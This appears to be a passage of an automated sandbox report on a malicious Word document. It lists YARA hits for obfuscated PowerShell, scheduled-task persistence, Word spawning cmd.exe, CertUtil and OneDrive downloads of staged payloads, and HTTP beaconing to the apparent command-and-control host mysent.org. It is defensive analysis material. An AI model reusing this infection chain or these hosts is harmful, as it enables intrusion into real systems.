Source: 00000024.00000000.16508717527.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000024.00000000.16509432349.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000024.00000000.16509719926.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000025.00000000.16510560264.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000025.00000002.16572994813.00160000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000025.00000002.16573202405.004CF000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000025.00000002.16573179221.004BF000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000025.00000002.16573258362.004E1000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000025.00000002.16573119211.00490000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000024.00000000.16510314431.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: dropped\580A98AB00459B6800754CE6A4E140AE0, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y2YPC48Z\access.log[1].txt, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\580A98AB00459B6800754CE6A4E140AE, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R03ZXFR8\access.log[1].txt, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Shows file infection / information gathering behavior (enumerates multiple directory for files)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 1343

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: mysent.org
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.81:49162 -> 188.241.39.220:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.81:49162 -> 188.241.39.220:443

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /hpmys.txt HTTP/1.1Host: mysent.org
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 462
Source: global trafficHTTP traffic detected: POST /modules/default.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 206
Source: global trafficHTTP traffic detected: GET /modules/default.php HTTP/1.1Cookie: session=GTGEDi6ekpdvoTbGTxmvGYlZl9Y=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.org
Source: global trafficHTTP traffic detected: POST /modules/main.php HTTP/1.1User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 94
Source: global trafficHTTP traffic detected: POST /modules/main.php HTTP/1.1User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 238
Source: global trafficHTTP traffic detected: GET /modules/default.php HTTP/1.1Cookie: session=A28CY7CTtyMIsdT0xdubajbuXDs=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.org
Source: global trafficHTTP traffic detected: POST /modules/default.php HTTP/1.1User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 2830
Source: global trafficHTTP traffic detected: GET /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 462
Source: global trafficHTTP traffic detected: GET /modules/main.php HTTP/1.1Cookie: session=+6QNckPfZ1I1gtw1brM9/Zms3DU=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.org
Source: global trafficHTTP traffic detected: POST /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 462
Source: global trafficHTTP traffic detected: POST /modules/main.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 206
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /access.log.txt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: mysent.org
Source: global trafficHTTP traffic detected: GET /access.log.txt HTTP/1.1Accept: */*User-Agent: CertUtil URL AgentHost: mysent.orgCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /v1.0/shares/s!ArI-XSG7nP5zbTpZANb3-dz_oU8/driveitem/content HTTP/1.1User-Agent: Microsoft SkyDriveSync 17.005.0107.0008 ship; Windows NT 10.0 (16299)Host: api.onedrive.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /y4mLDnW_sdiYZdrKuP_hiNnzpiLk2TKmTpCsB8gTSB6nzLeQ5XI6zgdcTjR3JG3Poj0uB4PFybzxs8PnowL5t489i5OJYPLU1pFu0EfBu2R-TNgGUEBJrDX6xp0txVyQUcI1vVcyu6-6Ytt0A_2SLJjd9KGnvOs0gS38Yc972-fShnY6NOZB_GJMLZNHGwfgo2STbA3YPaoscB3eIa7eLbNlA/STAGE0-PS.txt HTTP/1.1User-Agent: Microsoft SkyDriveSync 17.005.0107.0008 ship; Windows NT 10.0 (16299)Host: dgdadq.dm.files.1drv.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /modules/default.php HTTP/1.1Cookie: session=GTGEDi6ekpdvoTbGTxmvGYlZl9Y=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.org
Source: global trafficHTTP traffic detected: GET /hpmys.txt HTTP/1.1Host: mysent.org
Source: global trafficHTTP traffic detected: GET /access.log.txt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: mysent.org
Source: global trafficHTTP traffic detected: GET /access.log.txt HTTP/1.1Accept: */*User-Agent: CertUtil URL AgentHost: mysent.orgCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /modules/default.php HTTP/1.1Cookie: session=A28CY7CTtyMIsdT0xdubajbuXDs=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.org
Source: global trafficHTTP traffic detected: GET /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgConnection: Keep-Alive
